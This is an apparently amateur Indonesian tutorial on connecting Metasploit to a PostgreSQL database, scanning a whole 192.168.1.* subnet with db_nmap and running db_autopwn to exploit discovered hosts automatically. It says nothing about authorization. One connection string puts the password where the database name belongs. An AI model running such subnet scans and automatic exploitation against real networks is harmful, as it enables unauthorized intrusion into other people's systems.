Exploitasi Metasploit Dengan db_postgresql

Metasploit adalah salah satu dari database terbaik dan software yang memiliki daftar eksploitasi untuk software - software yang berbeda, nmap adalah alat pemindai jaringan besar dan ketika kita mengintegrasikan Metasploit dan nmap satu sama lain kita dapat membuat kombinasi indah yang benar-benar membantu dalam proses akan penetration testing.

1. Install Postgresql

sudo su apt-get install postgresql-8.4

2. Setelah proses instalasi selesai, rubah password postgresql

su postgres -c psql

root@h3ll0s:~# su postgres -c psql
could not change directory to "/root"
psql (8.4.10)
Type "help" for help.
postgres=#

ketik \password pada postgres=#
maka akan menjadi:

root@h3ll0s:~# su postgres -c psql
could not change directory to "/root"
psql (8.4.10)
Type "help" for help.
postgres=# \password
Enter new password: password anda
Enter it again: password anda

3. Mulailah dengan menjalankan postgresql

/etc/init.d/postgresql-8.4 start

4. Connect postgresql dengan metasploit

msfconsole -q
msf>db_connect postgres:(password anda)@127.0.0.1:5432/(password anda)

default pada postgresql adalah 127.0.0.1 dengan port 5432

5. Lakukan scanning host yang ada di dalam jaringan

db_nmap 192.168.1.*

6. Jika telah menemukan target, maka berikut scan untuk identifikasi target

db_nmap (IP_Target)

7. Lakukan autopwn untuk verifikasi vulnerable dan auto exploit pada target

db_autopwn -p -e -t

done.

thanks to : h3ll0s